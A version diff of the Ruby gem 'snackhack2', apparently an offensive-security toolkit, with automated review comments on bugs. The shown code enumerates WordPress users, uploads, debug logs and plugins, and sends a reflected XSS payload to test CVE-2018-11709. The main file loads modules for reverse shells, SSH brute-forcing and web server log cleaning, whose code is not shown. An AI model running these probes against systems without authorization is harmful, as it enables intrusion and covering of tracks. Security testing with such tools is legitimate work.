snackhack2 0.6.4 → 0.6.5

@@ -1,28 +1,28 @@
1
- # frozen_string_literal: true
2
-
3
- require 'nokogiri'
4
- require 'open-uri'
5
- module Snackhack2
6
- class WebsiteLinks
7
- attr_accessor :save_file, :site
8
-
9
- def initialize(save_file: true)
10
- @site = site
11
- @save_file = save_file
12
- end
13
-
14
- def run
15
- doc = Nokogiri::HTML(URI.open(@site))
16
- links = doc.xpath('//a')
17
- all_links = links.map { |e| e['href'] }.compact
18
- content = all_links.uniq.join("\n")
19
- if @save_file
20
- Snackhack2::file_save(@site, "links", content)
21
- else
22
- all_links.each do |links|
23
- puts links
24
- end
25
- end
26
- end
27
- end
28
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'open-uri'
5
+ module Snackhack2
6
+ class WebsiteLinks
7
+ attr_accessor :save_file, :site
8
+
9
+ def initialize(save_file: true)
10
+ @site = site
11
+ @save_file = save_file
12
+ end
13
+
14
+ def run
15
+ doc = Nokogiri::HTML(URI.open(@site))
16
+ links = doc.xpath('//a')
17
+ all_links = links.map { |e| e['href'] }.compact
18
+ content = all_links.uniq.join("\n")
19
+ if @save_file
20
+ Snackhack2.file_save(@site, 'links', content)
21
+ else
22
+ all_links.each do |links|
23
+ puts links
24
+ end
25
+ end
26
+ end
27
+ end
28
+ end
@@ -1,20 +1,33 @@
1
- # frozen_string_literal: true
2
-
3
- require 'nokogiri'
4
- require 'open-uri'
5
- module Snackhack2
6
- class WebsiteMeta
7
- attr_accessor :site
8
- def initialize
9
- @site = site
10
- end
11
-
12
- def run
13
- doc = Nokogiri::HTML(URI.open(@site))
14
- posts = doc.xpath('//meta')
15
- posts.each do |link|
16
- puts "#{link.attributes['name']}: #{link.attributes['content']}" unless link.attributes['name'].nil?
17
- end
18
- end
19
- end
20
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'open-uri'
5
+ module Snackhack2
6
+ class WebsiteMeta
7
+ attr_accessor :site
8
+
9
+ def initialize()
10
+ @site = site
11
+ end
12
+
13
+ def run
14
+ doc = Nokogiri::HTML(URI.open(@site))
15
+ posts = doc.xpath('//meta')
16
+ posts.each do |link|
17
+ puts "#{link.attributes['name']}: #{link.attributes['content']}" unless link.attributes['name'].nil?
18
+ end
19
+ end
20
+ def description
21
+ begin
22
+ doc = Nokogiri::HTML(URI.open("https://#{@site}", "User-Agent" => Snackhack2::UA))
23
+ if !doc.xpath('/html/head/meta[@name="description"]/@content').to_s.empty?
24
+ doc.xpath('/html/head/meta[@name="description"]/@content').to_s
25
+ end
26
+ #dsp <<
27
+
28
+ rescue => e
29
+ puts "ERROR: #{e}"
30
+ end
31
+ end
32
+ end
33
+ end
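Review bot: The new `description` method builds its URL as `"https://#{@site}"`, while `run` in the same class passes `@site` to `URI.open` unchanged, so the two methods disagree on whether `@site` carries a scheme and one of them will fail for any given value. Pick one convention; if `@site` is meant to be a full URL, as `run` implies, the call becomes `URI.open(@site, 'User-Agent' => Snackhack2::UA)`. The method also evaluates the same XPath twice, and on error it returns the `nil` from `puts`, so a caller cannot tell a failed fetch from a page that has no description. Storing the XPath result in a local and rescuing a narrower exception class would make both cases explicit.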
@@ -1,128 +1,120 @@
1
- # frozen_string_literal: true
2
-
3
- require 'nokogiri'
4
- require 'json'
5
- module Snackhack2
6
- class WordPress
7
- attr_accessor :save_file, :site
8
-
9
- def initialize(save_file: true)
10
- @site = site
11
- @save_file = save_file
12
- end
13
-
14
- def run
15
- wp_login
16
- yoast_seo
17
- users
18
- wp_content_uploads
19
- all_in_one_seo
20
- wp_log
21
- end
22
-
23
- def file_site
24
- @site = @site.gsub('https://', '')
25
- end
26
-
27
- def users
28
- found_users = ''
29
- begin
30
- users = Snackhack2::get(File.join(@site, "wp-json", "wp", "v2", "users")).body
31
- json = JSON.parse(users)
32
- json.each do |k|
33
- found_users += "#{k['name']}\n"
34
- end
35
- rescue StandardError => e
36
- puts "[+] users not found\n\n\n"
37
- end
38
-
39
- if !found_users.empty?
40
- if @save_file
41
- Snackhack2::file_save(@site, "users", found_users)
42
- else
43
- puts found_users
44
- end
45
- end
46
- end
47
-
48
- def wp_content_uploads
49
- s = Snackhack2::get(File.join(@site, '/wp-content/uploads/'))
50
- if s.code == 200
51
- if s.body.include?('Index of')
52
- puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid...\n\n\n"
53
- end
54
- end
55
- end
56
-
57
- def wp_login
58
- percent = 0
59
- ## todo: maybe add Bayes Theorem to detect wp
60
- wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
61
- 'wordpress-login-url.jpg', 'wp-content/themes/', 'wp-json']
62
- login = Snackhack2::get(File.join(@site, "wp-login.php"))
63
- if login.code == 200
64
- wp.each do |path|
65
- percent += 10 if login.body.include?(path)
66
- end
67
- end
68
- login2 = Snackhack2::get(@site.to_s)
69
- wp.each do |path|
70
- percent += 10 if login2.body.include?(path)
71
- end
72
- puts "Wordpress Points: #{percent}"
73
- end
74
-
75
- def yoast_seo
76
- ys = Snackhack2::get(@site)
77
- if ys.code == 200
78
- yoast_version = ys.body.split("<!-- This site is optimized with the Yoast SEO Premium plugin")[1].split(" -->")[0]
79
- ["This site is optimized with the Yoast SEO plugin",
80
- "This site is optimized with the Yoast SEO Premium plugin"].each do |site|
81
- if !ys.body.scan(/#{site}/).shift.nil?
82
- puts "#{ys.body.scan(/#{site}/).shift.to_s} with version #{yoast_version}"
83
- end
84
- end
85
- end
86
- end
87
-
88
- def all_in_one_seo
89
- alios = Snackhack2::get(@site)
90
- if alios.code == 200
91
- if alios.body.scan(/(All in One SEO Pro\s\d.\d.\d)/)
92
- puts "Site is using the plugin: #{alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)}"
93
- end
94
- end
95
- end
96
-
97
- def wp_log
98
- wplog_score = 0
99
- wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
100
- log = Snackhack2::get(File.join(@site, "/wp-content/debug.log"))
101
- if log.code == 200
102
- puts "[+] #{File.join(@site, "/wp-content/debug.log")} is giving status 200. Now double checking...\n\n\n"
103
- wp.each do |e|
104
- if log.body.include?(e)
105
- wplog_score += 10
106
- end
107
- end
108
- end
109
- puts "WordPress Log score: #{wplog_score}...\n\n\n"
110
- end
111
-
112
- def wp_plugin
113
- wp_plugin_score = 0
114
- wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
115
- plug = Snackhack2::get(File.join(@site, '/wp-content/plugins/'))
116
- if plug.code == 200
117
- puts "[+] Looks like #{File.join(@site,
118
- '/wp-content/plugins/')} is giving status 200. Checking to make sure...\n\n\n"
119
- wp.each do |e|
120
- if plug.body.include?(e)
121
- wp_plugin_score += 10
122
- end
123
- end
124
- end
125
- puts "[+] WordPress Plugin Score: #{wp_plugin_score}"
126
- end
127
- end
128
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'json'
5
+ module Snackhack2
6
+ class WordPress
7
+ attr_accessor :save_file, :site
8
+
9
+ def initialize(save_file: true)
10
+ @site = site
11
+ @save_file = save_file
12
+ end
13
+
14
+ def run
15
+ wp_login
16
+ yoast_seo
17
+ users
18
+ wp_content_uploads
19
+ all_in_one_seo
20
+ wp_log
21
+ end
22
+
23
+ def file_site
24
+ @site = @site.gsub('https://', '')
25
+ end
26
+
27
+ def users
28
+ found_users = ''
29
+ begin
30
+ users = Snackhack2.get(File.join(@site, 'wp-json', 'wp', 'v2', 'users')).body
31
+ json = JSON.parse(users)
32
+ json.each do |k|
33
+ found_users += "#{k['name']}\n"
34
+ end
35
+ rescue StandardError
36
+ puts "[+] users not found\n\n\n"
37
+ end
38
+
39
+ return if found_users.empty?
40
+
41
+ if @save_file
42
+ Snackhack2.file_save(@site, 'users', found_users)
43
+ else
44
+ puts found_users
45
+ end
46
+ end
47
+
48
+ def wp_content_uploads
49
+ s = Snackhack2.get(File.join(@site, '/wp-content/uploads/'))
50
+ return unless s.code == 200
51
+ return unless s.body.include?('Index of')
52
+
53
+ puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid...\n\n\n"
54
+ end
55
+
56
+ def wp_login
57
+ percent = 0
58
+ ## todo: maybe add Bayes Theorem to detect wp
59
+ wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
60
+ 'wordpress-login-url.jpg', 'wp-content/themes/', 'wp-json']
61
+ login = Snackhack2.get(File.join(@site, 'wp-login.php'))
62
+ if login.code == 200
63
+ wp.each do |path|
64
+ percent += 10 if login.body.include?(path)
65
+ end
66
+ end
67
+ login2 = Snackhack2.get(@site.to_s)
68
+ wp.each do |path|
69
+ percent += 10 if login2.body.include?(path)
70
+ end
71
+ puts "Wordpress Points: #{percent}"
72
+ end
73
+
74
+ def yoast_seo
75
+ ys = Snackhack2.get(@site)
76
+ return unless ys.code == 200
77
+
78
+ yoast_version = ys.body.split('<!-- This site is optimized with the Yoast SEO Premium plugin')[1].split(' -->')[0]
79
+ ['This site is optimized with the Yoast SEO plugin',
80
+ 'This site is optimized with the Yoast SEO Premium plugin'].each do |site|
81
+ puts "#{ys.body.scan(/#{site}/).shift} with version #{yoast_version}" unless ys.body.scan(/#{site}/).shift.nil?
82
+ end
83
+ end
84
+
85
+ def all_in_one_seo
86
+ alios = Snackhack2.get(@site)
87
+ return unless alios.code == 200
88
+ return unless alios.body.scan(/(All in One SEO Pro\s\d.\d.\d)/)
89
+
90
+ puts "Site is using the plugin: #{alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)}"
91
+ end
92
+
93
+ def wp_log
94
+ wplog_score = 0
95
+ wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
96
+ log = Snackhack2.get(File.join(@site, '/wp-content/debug.log'))
97
+ if log.code == 200
98
+ puts "[+] #{File.join(@site, '/wp-content/debug.log')} is giving status 200. Now double checking...\n\n\n"
99
+ wp.each do |e|
100
+ wplog_score += 10 if log.body.include?(e)
101
+ end
102
+ end
103
+ puts "WordPress Log score: #{wplog_score}...\n\n\n"
104
+ end
105
+
106
+ def wp_plugin
107
+ wp_plugin_score = 0
108
+ wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
109
+ plug = Snackhack2.get(File.join(@site, '/wp-content/plugins/'))
110
+ if plug.code == 200
111
+ puts "[+] Looks like #{File.join(@site,
112
+ '/wp-content/plugins/')} is giving status 200. Checking to make sure...\n\n\n"
113
+ wp.each do |e|
114
+ wp_plugin_score += 10 if plug.body.include?(e)
115
+ end
116
+ end
117
+ puts "[+] WordPress Plugin Score: #{wp_plugin_score}"
118
+ end
119
+ end
120
+ end
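Review bot: In `yoast_seo`, `ys.body.split('<!-- This site is optimized with the Yoast SEO Premium plugin')[1]` is `nil` whenever the page lacks the Premium marker, so the chained `.split(' -->')` raises `NoMethodError` before the loop that checks for either marker runs. Because `run` calls the probes in sequence without a rescue, `users`, `wp_content_uploads`, `all_in_one_seo` and `wp_log` then never execute for that target. Guard the lookup, e.g. `marker = ys.body.split('<!-- This site is optimized with the Yoast SEO Premium plugin')[1]` followed by `yoast_version = marker&.split(' -->')&.first`. Separately, the new guard `return unless alios.body.scan(...)` in `all_in_one_seo` never returns early, because `scan` yields an array that is truthy even when empty; `match?` expresses the intended check.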
@@ -1,22 +1,23 @@
1
- # frozen_string_literal: true
2
-
3
- require 'httparty'
4
- module Snackhack2
5
- class WPForoForum
6
- attr_accessor :site
7
- def initialize
8
- @site = site
9
- end
10
-
11
- # wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
12
- # source: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709
13
- def run
14
- wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
15
- if wp.code == 200
16
- puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
17
- else
18
- puts "[+] HTTP code #{wp.code}"
19
- end
20
- end
21
- end
22
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'httparty'
4
+ module Snackhack2
5
+ class WPForoForum
6
+ attr_accessor :site
7
+
8
+ def initialize
9
+ @site = site
10
+ end
11
+
12
+ # wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
13
+ # source: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709
14
+ def run
15
+ wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
16
+ if wp.code == 200
17
+ puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
18
+ else
19
+ puts "[+] HTTP code #{wp.code}"
20
+ end
21
+ end
22
+ end
23
+ end
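--- a/data/lib/snackhack2.rb
+++ b/data/lib/snackhack2.rb
@@ -1,81 +1,84 @@
- # frozen_string_literal: true
-
- require 'uri'
- require 'httparty'
-
- require_relative 'snackhack2/version'
- require_relative 'snackhack2/bannergrabber'
- require_relative 'snackhack2/wordpress'
- require_relative 'snackhack2/portscan'
- require_relative 'snackhack2/iplookup'
- require_relative 'snackhack2/robots'
- require_relative 'snackhack2/subdomains'
- require_relative 'snackhack2/sshbrute'
- require_relative 'snackhack2/website_meta'
- require_relative 'snackhack2/google_analytics'
- require_relative 'snackhack2/cryptoextractor'
- require_relative 'snackhack2/website_links'
- require_relative 'snackhack2/webserver_log_cleaner'
- require_relative 'snackhack2/wpForo_Forum'
- require_relative 'snackhack2/WP_Symposium'
- require_relative 'snackhack2/phone_number'
- require_relative 'snackhack2/emails'
- require_relative 'snackhack2/drupal'
- require_relative 'snackhack2/Honeywell_PM43'
- require_relative 'snackhack2/sitemap'
- require_relative 'snackhack2/tomcat'
- require_relative 'snackhack2/subdomains2'
- require_relative 'snackhack2/reverse_shell'
- require_relative 'snackhack2/forward_remote'
- require_relative 'snackhack2/screenshots'
- require_relative 'snackhack2/indirect_command_injection'
- require_relative 'snackhack2/list_users'
- require_relative "snackhack2/bypass_403"
- require_relative "snackhack2/comments"
- require_relative "snackhack2/ssrf"
- module Snackhack2
- UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
- def self.read_serverversion
- files = Dir['*.txt']
- files.each do |f|
- read = File.read(f)
- puts "#{f.split('_')[0]}: #{read}"
- end
- end
-
- def self.clean_serverversion
- # this wil remove all files that have '_serverversion'
- # in the file name
- Dir['*.txt'].each do |file|
- if file.include?('_serverversion')
- puts "[+] deleting #{file}..."
- File.delete(file)
- end
- end
- end
-
- def self.file_save(site, type, content, ip: false)
- hostname = URI.parse(site).host
- File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
- puts "[+] Saving file to #{hostname}_#{type}.txt..."
- end
-
- def self.get(site)
- HTTParty.get(site, { headers: { "User-Agent" => UA } })
- end
-
- def self.clean_portscan
- Dir['*_port_scan.txt'].each do |file|
- puts "[+] deleting #{file}..."
- File.delete(file)
- end
- end
-
- def self.read_portscan
- files = Dir['*_port_scan.txt']
- files.each do |f|
- read = File.read(f)
- puts "#{f.split('_')[0]}: #{read}"
- end
- end
- end
+ # frozen_string_literal: true
+
+ require 'uri'
+ require 'httparty'
+
+ require_relative 'snackhack2/version'
+ require_relative 'snackhack2/bannergrabber'
+ require_relative 'snackhack2/wordpress'
+ require_relative 'snackhack2/portscan'
+ require_relative 'snackhack2/iplookup'
+ require_relative 'snackhack2/robots'
+ require_relative 'snackhack2/subdomains'
+ require_relative 'snackhack2/sshbrute'
+ require_relative 'snackhack2/website_meta'
+ require_relative 'snackhack2/google_analytics'
+ require_relative 'snackhack2/cryptoextractor'
+ require_relative 'snackhack2/website_links'
+ require_relative 'snackhack2/webserver_log_cleaner'
+ require_relative 'snackhack2/wpForo_Forum'
+ require_relative 'snackhack2/WP_Symposium'
+ require_relative 'snackhack2/phone_number'
+ require_relative 'snackhack2/emails'
+ require_relative 'snackhack2/drupal'
+ require_relative 'snackhack2/Honeywell_PM43'
+ require_relative 'snackhack2/sitemap'
+ require_relative 'snackhack2/tomcat'
+ require_relative 'snackhack2/subdomains2'
+ require_relative 'snackhack2/reverse_shell'
+ require_relative 'snackhack2/forward_remote'
+ require_relative 'snackhack2/screenshots'
+ require_relative 'snackhack2/indirect_command_injection'
+ require_relative 'snackhack2/list_users'
+ require_relative 'snackhack2/bypass_403'
+ require_relative 'snackhack2/comments'
+ require_relative 'snackhack2/ssrf'
+ require_relative 'snackhack2/dns'
+ require_relative 'snackhack2/CVE-2017-9841'
+ require_relative 'snackhack2/phishing_tlds'
+ module Snackhack2
+ UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'
+ def self.read_serverversion
+ files = Dir['*.txt']
+ files.each do |f|
+ read = File.read(f)
+ puts "#{f.split('_')[0]}: #{read}"
+ end
+ end
+
+ def self.clean_serverversion
+ # this wil remove all files that have '_serverversion'
+ # in the file name
+ Dir['*.txt'].each do |file|
+ if file.include?('_serverversion')
+ puts "[+] deleting #{file}..."
+ File.delete(file)
+ end
+ end
+ end
+
+ def self.file_save(site, type, content, ip: false)
+ hostname = URI.parse(site).host
+ File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
+ puts "[+] Saving file to #{hostname}_#{type}.txt..."
+ end
+
+ def self.get(site)
+ HTTParty.get(site, { headers: { 'User-Agent' => UA } })
+ end
+
+ def self.clean_portscan
+ Dir['*_port_scan.txt'].each do |file|
+ puts "[+] deleting #{file}..."
+ File.delete(file)
+ end
+ end
+
+ def self.read_portscan
+ files = Dir['*_port_scan.txt']
+ files.each do |f|
+ read = File.read(f)
+ puts "#{f.split('_')[0]}: #{read}"
+ end
+ end
+ end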
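Review bot: `file_save` derives the output name from `URI.parse(site).host`, which is `nil` when `site` has no scheme, so results for every such target are written to the same `_<type>.txt` file and overwrite each other without warning. Fail loudly instead, e.g. `hostname = URI.parse(site).host || raise(ArgumentError, "no host in #{site.inspect}")`. The `ip:` keyword is accepted but never read in the method body, so it should either be used or dropped from the signature.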